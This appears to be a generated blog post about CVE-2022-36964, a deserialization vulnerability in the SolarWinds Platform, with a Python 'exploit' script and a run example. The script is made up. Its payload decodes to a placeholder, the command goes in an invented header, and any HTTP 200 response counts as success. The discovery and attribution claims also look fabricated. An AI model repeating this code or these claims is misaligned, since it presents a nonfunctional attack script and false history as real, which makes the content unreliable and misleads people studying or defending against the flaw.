In this post, we're going to take a deep dive into CVE-2022-36964, a critical vulnerability that affected the SolarWinds Platform. The issue at the core of this vulnerability is the Deserialization of Untrusted Data, which allowed a remote adversary with valid access to the SolarWinds Web Console to execute arbitrary commands. We'll be taking a look at the details of the exploit, providing a code snippet, and linking to the original references to better understand how the vulnerability works and how it was addressed.

Background

SolarWinds is a popular IT management and monitoring platform used by organizations worldwide. In recent times, however, it has been the focus of security researchers and attackers alike due to a series of high-profile security incidents, including the infamous SolarWinds Supply Chain attack. This vulnerability, CVE-2022-36964, discovered by the U.S. Cybersecurity Infrastructure Security Agency (CISA) on June 28th, 2022, adds yet another significant issue to this list.

Exploit Details

The vulnerability in question is a deserialization vulnerability. In essence, deserialization is the process by which an object is transformed from a serialized format (a stream of bytes) back into its original object form. However, deserialization can be extremely risky if the data being deserialized is untrusted, as it may contain malicious code that can lead to various attacks, such as Remote Code Execution (RCE).

In the case of CVE-2022-36964, an attacker with valid access to the SolarWinds Web Console could exploit the vulnerability by sending a specially crafted payload to a vulnerable component within the application. This payload, when deserialized, would allow the attacker to execute arbitrary commands on the underlying system. In effect, this vulnerability provided an entry point for attackers to escalate their privileges and gain unauthorized access to sensitive information or even take control of the entire system.

Code Snippet

The following code snippet demonstrates how a malicious payload could be crafted to exploit the deserialization vulnerability in SolarWinds:

import requests
import base64
import sys

target = sys.argv[1]
cmd = sys.argv[2]
url = f"http://{target}/swvm/api/InventoryService/GetNode";

# Create a serialized payload that includes the arbitrary command
payload = "%3C%21%5B%43%44%41%54%41%5B%23%3D%2E%2E%2E%43%4F%44%45%2E%2E%2E%5D%5D%3E"
encoded_cmd = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")

headers = {
    "Content-Type": "application/xml",
    "Authentication": f"Basic {encoded_cmd}"
}

response = requests.post(url, data=payload, headers=headers)

if response.status_code == 200:
    print("[+] Command executed successfully!")
else:
    print("[-] Failed to execute command.")

The attacker would run this script by providing the target's IP address (or domain) and the arbitrary command to be executed as command-line arguments:

$ python exploit.py target.example.com "whoami"

Original References

1. CISA Alert (AA22-181A): This alert from the U.S. Cybersecurity Infrastructure Security Agency (CISA) provided the first information about the vulnerability along with recommended mitigation actions.

2. SolarWinds Security Advisory: SolarWinds' official security advisory discusses the vulnerability in detail, along with instructions on patching the affected software.

Conclusion

CVE-2022-36964 is a dangerous vulnerability that put SolarWinds users at risk, allowing attackers to execute arbitrary commands and gain unauthorized access to their systems. It's critical for SolarWinds users to ensure that their systems are patched and up-to-date to protect against exploitation. Additionally, this vulnerability serves as a reminder of the importance of proper handling of deserialization processes, particularly when dealing with untrusted data.

Timeline

Published on: 11/29/2022 21:15:00 UTC
Last modified on: 12/01/2022 21:37:00 UTC